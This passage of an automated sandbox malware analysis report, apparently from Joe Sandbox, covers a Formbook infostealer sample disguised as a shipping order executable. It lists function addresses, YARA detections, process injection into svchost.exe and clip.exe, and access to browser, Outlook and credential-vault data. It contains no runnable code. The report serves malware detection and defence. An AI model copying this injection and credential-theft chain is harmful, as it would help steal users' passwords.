Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04810C00	3_2_04810C00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04828DBF	3_2_04828DBF
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0480ADE0	3_2_0480ADE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0481AD00	3_2_0481AD00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048ACD1F	3_2_048ACD1F
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04822E90	3_2_04822E90
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CCE93	3_2_048CCE93
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CEEDB	3_2_048CEEDB
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CEE26	3_2_048CEE26
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04810E59	3_2_04810E59
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0488EFA0	3_2_0488EFA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04802FC8	3_2_04802FC8
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04852F28	3_2_04852F28
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04830F30	3_2_04830F30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048B2F30	3_2_048B2F30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04884F40	3_2_04884F40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0483E8F0	3_2_0483E8F0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0481A840	3_2_0481A840
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04812840	3_2_04812840
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_047F68B8	3_2_047F68B8
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048129A0	3_2_048129A0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048DA9A6	3_2_048DA9A6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04826962	3_2_04826962
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0480EA80	3_2_0480EA80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C6BD7	3_2_048C6BD7
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CAB40	3_2_048CAB40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CF43F	3_2_048CF43F
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04801460	3_2_04801460
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048AD5B0	3_2_048AD5B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048D95C3	3_2_048D95C3
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C7571	3_2_048C7571
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C16CC	3_2_048C16CC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04855630	3_2_04855630
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CF7B0	3_2_048CF7B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048170C0	3_2_048170C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048BF0CC	3_2_048BF0CC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C70E9	3_2_048C70E9
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CF0E0	3_2_048CF0E0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_047FF172	3_2_047FF172
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0481B1B0	3_2_0481B1B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048DB16B	3_2_048DB16B
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0484516C	3_2_0484516C
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048152A0	3_2_048152A0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0482B2C0	3_2_0482B2C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048B12ED	3_2_048B12ED
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0482D2F0	3_2_0482D2F0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0485739A	3_2_0485739A
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_047FD34C	3_2_047FD34C
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C132D	3_2_048C132D
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CFCF2	3_2_048CFCF2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04889C32	3_2_04889C32
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0482FDC0	3_2_0482FDC0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04813D40	3_2_04813D40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C1D5A	3_2_048C1D5A
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C7D73	3_2_048C7D73
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04819EB0	3_2_04819EB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04811F92	3_2_04811F92
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CFFB1	3_2_048CFFB1
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CFF09	3_2_048CFF09
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_047D3FD5	3_2_047D3FD5
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_047D3FD2	3_2_047D3FD2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048138E0	3_2_048138E0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0487D800	3_2_0487D800
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048A5910	3_2_048A5910
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04819950	3_2_04819950
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0482B950	3_2_0482B950
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04855AA0	3_2_04855AA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048ADAAC	3_2_048ADAAC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048B1AA3	3_2_048B1AA3
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048BDAC6	3_2_048BDAC6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CFA49	3_2_048CFA49
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C7A46	3_2_048C7A46
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04883A6C	3_2_04883A6C
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0482FB80	3_2_0482FB80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04885BF0	3_2_04885BF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0484DBF9	3_2_0484DBF9
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CFB76	3_2_048CFB76
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028C1720	3_2_028C1720
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028DA280	3_2_028DA280
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028BABB0	3_2_028BABB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028BCB30	3_2_028BCB30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028BC908	3_2_028BC908
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028BC910	3_2_028BC910
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028C3270	3_2_028C3270
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0464A43A	3_2_0464A43A
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0464C0FC	3_2_0464C0FC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0464B168	3_2_0464B168
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0464BC44	3_2_0464BC44
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0464BD64	3_2_0464BD64

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0392B970 appears 254 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03975130 appears 37 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03987E54 appears 96 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 0488F290 appears 103 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 047FB970 appears 262 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 04857E54 appears 107 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 04845130 appears 58 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 0487EA12 appears 86 times
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: String function: 009A8B40 appears 42 times
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: String function: 00987F41 appears 35 times
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: String function: 009A0D27 appears 70 times

Source: MV Sunshine, ORDER.exe, 00000000.00000003.1682139228.00000000041AD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs MV Sunshine, ORDER.exe
Source: MV Sunshine, ORDER.exe, 00000000.00000003.1683834674.0000000004003000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs MV Sunshine, ORDER.exe

Source: MV Sunshine, ORDER.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/11

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009EA2D5 GetLastError,FormatMessageW,

0_2_009EA2D5

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009D8713 AdjustTokenPrivileges,CloseHandle,		0_2_009D8713
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_009D8CC3

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009EB59E

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_009FF121

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009F86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_009F86D0

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_00984FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00984FE9

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

File created: C:\Users\user\AppData\Local\Temp\autD2A9.tmp

Jump to behavior

Source: MV Sunshine, ORDER.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: clip.exe, 00000003.00000002.4132740210.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2055719479.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: MV Sunshine, ORDER.exe	ReversingLabs: Detection: 36%
Source: MV Sunshine, ORDER.exe	Virustotal: Detection: 30%

Source: unknown	Process created: C:\Users\user\Desktop\MV Sunshine, ORDER.exe "C:\Users\user\Desktop\MV Sunshine, ORDER.exe"
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV Sunshine, ORDER.exe"
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV Sunshine, ORDER.exe"	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: MV Sunshine, ORDER.exe

Static file information: File size 1259008 > 1048576

Source: MV Sunshine, ORDER.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MV Sunshine, ORDER.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MV Sunshine, ORDER.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MV Sunshine, ORDER.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MV Sunshine, ORDER.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MV Sunshine, ORDER.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: MV Sunshine, ORDER.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QAjjirwAoAEExvw.exe, 00000002.00000000.1797929729.0000000000CEE000.00000002.00000001.01000000.00000004.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4132539420.0000000000CEE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: MV Sunshine, ORDER.exe, 00000000.00000003.1681365995.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine, ORDER.exe, 00000000.00000003.1681714096.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1776961435.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775137879.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.000000000496E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1873512801.0000000004468000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1875354185.000000000461D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MV Sunshine, ORDER.exe, 00000000.00000003.1681365995.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine, ORDER.exe, 00000000.00000003.1681714096.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1776961435.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775137879.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.4134324267.000000000496E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1873512801.0000000004468000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1875354185.000000000461D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1873461084.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1841254218.000000000321A000.00000004.00000020.00020000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000002.4133106633.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.000000001685C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.000000001685C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1873461084.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1841254218.000000000321A000.00000004.00000020.00020000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000002.4133106633.0000000000E58000.00000004.00000020.00020000.00000000.sdmp

Source: MV Sunshine, ORDER.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MV Sunshine, ORDER.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MV Sunshine, ORDER.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
